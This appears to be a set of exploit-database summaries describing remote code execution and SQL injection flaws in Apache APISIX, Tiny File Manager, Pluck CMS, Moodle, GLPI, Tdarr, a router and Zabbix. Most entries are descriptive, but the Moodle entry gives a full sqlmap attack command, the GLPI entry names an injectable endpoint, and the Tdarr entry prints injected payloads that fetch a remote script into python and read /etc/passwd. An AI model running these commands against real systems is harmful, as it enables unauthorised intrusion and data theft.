A vulnerability in Apache APISIX versions 1.3 - 2.12.1 allows an attacker to execute arbitrary code on the target system. This is due to the lack of proper input validation when handling user-supplied data. An attacker can exploit this vulnerability by sending a maliciously crafted request to the target system.
Tiny File Manager 2.4.6 is vulnerable to Remote Code Execution (RCE) due to a lack of authentication. An attacker can exploit this vulnerability by sending a malicious POST request to the vulnerable application. This will allow the attacker to execute arbitrary code on the server.
A theme upload functionality in Pluck CMS before 4.7.16 allows an admin-privileged user to gain access to the host through the "themes files", which may result in remote code execution.
Moodle 2.7dev (Build: 20131129) to 3.11.5+ 2nd Order SQLi Exploit by muffin (@mufinnnnnnn). The exploit allows an authenticated user to inject malicious SQL code into the application. The exploit requires the user to define variables at the top of the tamper() function, create a file called req.txt, and run the tamper script with the command 'python sqlmap.py -u "http://127.0.0.1/moodle/badges/criteria_settings.php?badgeid=badge-id-replace-me&add=1&type=6" --tamper=moodle_2nd_order_sqli.py --data=@req.txt --level=5 --risk=3 --dbms=mysql --threads=10 --batch'.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
This exploit is related to the Baixar GLPI Project 9.4.6. It is a SQL injection vulnerability that allows an attacker to execute malicious SQL queries on the vulnerable system. The exploit is triggered by sending a specially crafted request to the plugins/ramo/ramoapirest.php/getOutdated?idu=-1 endpoint. The attacker can then use the sqlmap tool to enumerate the databases on the vulnerable system.
The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering, which allows the user to chain commands and spawn a reverse shell, e.g. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. Tdarr is not protected by any authentication by default, so no credentials are required to trigger RCE.
Executes commands without authentication as the admin user. To use it against all versions, only enter the router IP and port (if available) in the script; commands are executed as the root user.
This exploit is tested against Zabbix 5.0.17 only. It is a blind RCE exploit, so the results of the exploit will not be visible on the site. The exploit uses a Session object to authenticate the user and then adds an item with a system.run command to execute the code. The attacker IP and port are used as the trapper hosts. If the item name is found in the response text, the exploit is successful.